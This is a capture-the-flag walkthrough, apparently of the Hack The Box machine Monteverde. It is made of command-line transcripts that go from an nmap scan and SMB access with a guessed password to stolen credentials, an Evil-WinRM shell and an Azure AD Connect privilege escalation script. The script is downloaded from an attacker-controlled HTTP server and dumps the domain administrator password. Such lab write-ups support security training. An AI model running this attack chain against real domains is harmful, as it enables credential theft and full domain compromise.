└──╼ $sudo nmap -sV -sT -Pn -sC -O 10.10.10.172 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 05:27 BST
Nmap scan report for 10.10.10.172
Host is up (0.27s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-20 03:55:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49775/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/20%Time=5E9D283E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -47m30s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-20T03:57:38
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1206.98 seconds
After enum, we have couple usernames:
MEGABANK\Administrator
MEGABANK\krbtgt
MEGABANK\AAD_987d7f2f57d2
MEGABANK\mhope
MEGABANK\SABatchJobs
MEGABANK\svc-ata
MEGABANK\svc-bexec
MEGABANK\svc-netapp
MEGABANK\dgalanos
MEGABANK\roleary
MEGABANK\smorgan
I tried some ways to login, and I were able to access SMB of SABatchJobs with password as username
┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient -U SABatchJobs -L \\10.10.10.172
Enter WORKGROUP\SABatchJobs's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
SMB1 disabled -- no workgroup available
We can see user can has access to "user$" directory
┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 13:12:48 2020
.. D 0 Fri Jan 3 13:12:48 2020
dgalanos D 0 Fri Jan 3 13:12:30 2020
mhope D 0 Fri Jan 3 13:41:18 2020
roleary D 0 Fri Jan 3 13:10:30 2020
smorgan D 0 Fri Jan 3 13:10:24 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos
smb: \dgalanos\> dir
. D 0 Fri Jan 3 13:12:30 2020
.. D 0 Fri Jan 3 13:12:30 2020
524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> dir mhope
mhope D 0 Fri Jan 3 13:41:18 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> type azure.xml
type: command not found
smb: \mhope\> more azure.xml
getting file \mhope\azure.xml of size 1212 as /tmp/smbmore.3eGmOU (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
"/tmp/smbmore.3eGmOU" may be a binary file. See it anyway?
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \mhope\> ^Z
[1]+ Stopped smbclient //10.10.10.172/users$ -U SABatchJobs
azure.xml:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
Ok now we have password of user "mhope"
┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> type ..\Desktop\user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents>
GETTING ROOT
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\>
After few mins google search about MEGABANK\Azure Admins
I found vulnerability: https://blog.xpnsec.com/azuread-connect-for-redteam/
┌─[laladee@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
┌─[laladee@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
┌─[✗]─[laladee@parrot]─[~]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-WebRequest "http://10.10.14.81:1337/Azure-ADConnect.ps1" -OutFile "C:\Users\mhope\Desktop\Azure_meo.ps1"
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/19/2020 9:46 PM 1454 AzureAD-Connect.ps1
-a---- 4/19/2020 10:42 PM 2264 Azure_meo.ps1
-a---- 4/19/2020 9:40 PM 1453 Connect.ps1
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./Azure_meo.ps1
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure_meo
The term 'Azure_meo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Azure_meo
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Azure_meo:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> exit
┌─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents>
